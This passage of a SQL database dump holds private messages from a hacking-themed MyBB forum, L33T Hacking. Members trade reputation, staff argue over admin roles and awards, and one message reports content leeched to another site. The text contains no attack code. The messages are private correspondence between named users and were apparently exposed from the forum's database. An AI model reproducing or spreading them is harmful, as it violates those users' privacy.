'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'hello', '0', 'hey i +reped you because i have been deciding who is the nicest member here and its you ', '1350865816', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3678', '257', '257', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey i +reped you because i have been deciding who is the nicest member here and its you \r\n[/quote]\r\n\r\ntnx bro', '1350866302', '0', '3', '1350866703', '1', '0', '2', '1350866627'); INSERT INTO mybb_privatemessages VALUES('3679', '228', '257', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey i +reped you because i have been deciding who is the nicest member here and its you \r\n[/quote]\r\n\r\ntnx bro', '1350866302', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3680', '228', '228', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: hello', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey i +reped you because i have been deciding who is the nicest member here and its you \r\n[/quote]\r\n\r\ntnx bro\r\n[/quote]\r\n\r\nno worries bro enjoy your ten rep :O', '1350866703', '0', '1', '0', '1', '0', '2', '1350866778'); INSERT INTO mybb_privatemessages VALUES('3681', '257', '228', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: hello', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey i +reped you because i have been deciding who is the nicest member here and its you \r\n[/quote]\r\n\r\ntnx bro\r\n[/quote]\r\n\r\nno worries bro enjoy your ten rep :O', '1350866703', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3682', '205', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '1', 'hey ', '0', 'hey im going to +rep you are you fine with that', '1350871754', '0', '3', '1350872075', '1', '0', '2', '1350872032'); INSERT INTO mybb_privatemessages VALUES('3683', '257', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'hey ', '0', 'hey im going to +rep you are you fine with that', '1350871754', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3684', '257', '257', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey ', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey im going to +rep you are you fine with that\r\n[/quote]\r\n\r\nHey mate,\r\n\r\nThat\'s fine, much appreciated :)', '1350872075', '0', '1', '0', '1', '0', '2', '1350872967'); INSERT INTO mybb_privatemessages VALUES('3685', '205', '257', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey im going to +rep you are you fine with that\r\n[/quote]\r\n\r\nHey mate,\r\n\r\nThat\'s fine, much appreciated :)', '1350872075', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3686', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:\r\n[/quote]\r\n\r\nok joker i +reped ypu 3+ but does count for rep asking JW\r\n[/quote]\r\n\r\nLol I was joking but thanks anyway :D ', '1350874151', '0', '3', '1350874745', '1', '0', '0', '1350874624'); INSERT INTO mybb_privatemessages VALUES('3688', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth', '1350874444', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3689', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: A', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?', '1350874559', '0', '3', '1350874779', '1', '0', '0', '1350874602'); INSERT INTO mybb_privatemessages VALUES('3691', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:\r\n[/quote]\r\n\r\nok joker i +reped ypu 3+ but does count for rep asking JW\r\n[/quote]\r\n\r\nLol I was joking but thanks anyway :D \r\n[/quote]\r\n\r\noh really well can i have some rep because i noticed almost everyone here has rep from you except me, and i am one of the most active :O', '1350874745', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3693', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(', '1350874779', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3694', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:\r\n[/quote]\r\n\r\nok joker i +reped ypu 3+ but does count for rep asking JW\r\n[/quote]\r\n\r\nLol I was joking but thanks anyway :D \r\n[/quote]\r\n\r\noh really well can i have some rep because i noticed almost everyone here has rep from you except me, and i am one of the most active :O\r\n[/quote]\r\n\r\nShoot, Didn\'t notice. ', '1350874805', '0', '3', '1350874899', '1', '0', '0', '1350874864'); INSERT INTO mybb_privatemessages VALUES('3696', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:\r\n[/quote]\r\n\r\nok joker i +reped ypu 3+ but does count for rep asking JW\r\n[/quote]\r\n\r\nLol I was joking but thanks anyway :D \r\n[/quote]\r\n\r\noh really well can i have some rep because i noticed almost everyone here has rep from you except me, and i am one of the most active :O\r\n[/quote]\r\n\r\nShoot, Didn\'t notice. \r\n[/quote]\r\n\r\nthanks very much. i am not going to ask again thanks admin :O', '1350874899', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3697', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]Apathy[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Painter\r\nDescription: Good at graphic designing. \r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350875035', '0', '1', '0', '1', '0', '0', '1350875045'); INSERT INTO mybb_privatemessages VALUES('3698', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: A', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n', '1350875091', '0', '3', '1350875350', '1', '0', '0', '1350875099'); INSERT INTO mybb_privatemessages VALUES('3700', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey man', '0', 'For the awards, How would I go about giving them. Not that i\'m going to give them all out, But Id like to know since in the help DOCX it says i\'m incharge of that. But In admin CP I have no privlidges\r\n', '1350875101', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3701', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:\r\n[/quote]\r\n\r\nok joker i +reped ypu 3+ but does count for rep asking JW\r\n[/quote]\r\n\r\nLol I was joking but thanks anyway :D \r\n[/quote]\r\n\r\noh really well can i have some rep because i noticed almost everyone here has rep from you except me, and i am one of the most active :O\r\n[/quote]\r\n\r\nShoot, Didn\'t notice. \r\n[/quote]\r\n\r\nthanks very much. i am not going to ask again thanks admin :O\r\n[/quote]\r\n\r\nNo problem :D', '1350875114', '0', '1', '0', '1', '0', '0', '1350875764'); INSERT INTO mybb_privatemessages VALUES('3702', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Hey man', '0', '[quote=\'NXK\']\r\nFor the awards, How would I go about giving them. Not that i\'m going to give them all out, But Id like to know since in the help DOCX it says i\'m incharge of that. But In admin CP I have no privlidges\r\n\r\n[/quote]\r\n\r\nI just checked the admin permissions and by default you weren\'t allow to give out awards. You can now give out awards, go to achivements>custom>AWARD>options>give a user>username>done.', '1350875280', '0', '3', '1350875509', '1', '0', '0', '1350875290'); INSERT INTO mybb_privatemessages VALUES('3704', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? ', '1350875350', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3771', '61', '61', '7', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Question', '0', 'Why was lh does yesterday', '1351045319', '0', '3', '1351049005', '0', '0', '0', '1351048990'); INSERT INTO mybb_privatemessages VALUES('4056', '333', '333', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"333\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum illest.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352413321', '0', '1', '0', '0', '0', '0', '1352413826'); INSERT INTO mybb_privatemessages VALUES('3773', '61', '7', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"7\";}}', '2', 'Re: Question', '0', '[quote=\'Romdu62\']\r\nWhy was lh does yesterday\r\n[/quote]\r\n\r\nCloud fare was down.', '1351049005', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3708', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey man', '0', 'Thank you good sir!', '1350875509', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3763', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Leech report', '0', 'Some guy who is now banned on LH has leeched some of our sites content. I reported some and got them removed by you are the original poster and you are also a member on the site it was leaked on, so file a report and get the content removed. Links to the leeched content\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=30583\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=28802\r\n\r\n\r\n\r\n', '1351040782', '0', '3', '1351069387', '1', '0', '0', '1351069304'); INSERT INTO mybb_privatemessages VALUES('3776', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Leech report', '0', '[quote=\'t3h jok3r\']\r\nSome guy who is now banned on LH has leeched some of our sites content. I reported some and got them removed by you are the original poster and you are also a member on the site it was leaked on, so file a report and get the content removed. Links to the leeched content\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=30583\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=28802\r\n\r\n\r\n\r\n\r\n[/quote]\r\n\r\nhe even used my images, did you ban him?', '1351069387', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3712', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: A', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.', '1350875669', '0', '3', '1350875843', '1', '0', '0', '1350875685'); INSERT INTO mybb_privatemessages VALUES('3713', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: Hey man', '0', '[quote=\'NXK\']\r\nThank you good sir!\r\n[/quote]\r\n\r\nNo problem.', '1350875688', '0', '1', '0', '1', '0', '0', '1350875721'); INSERT INTO mybb_privatemessages VALUES('3715', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... ', '1350875843', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3716', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: A', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... \r\n[/quote]\r\n\r\nWhatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions?', '1350876163', '0', '3', '1350876415', '1', '0', '0', '1350876292'); INSERT INTO mybb_privatemessages VALUES('3718', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... \r\n[/quote]\r\n\r\nWhatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions?\r\n[/quote]\r\nThat is the thing I 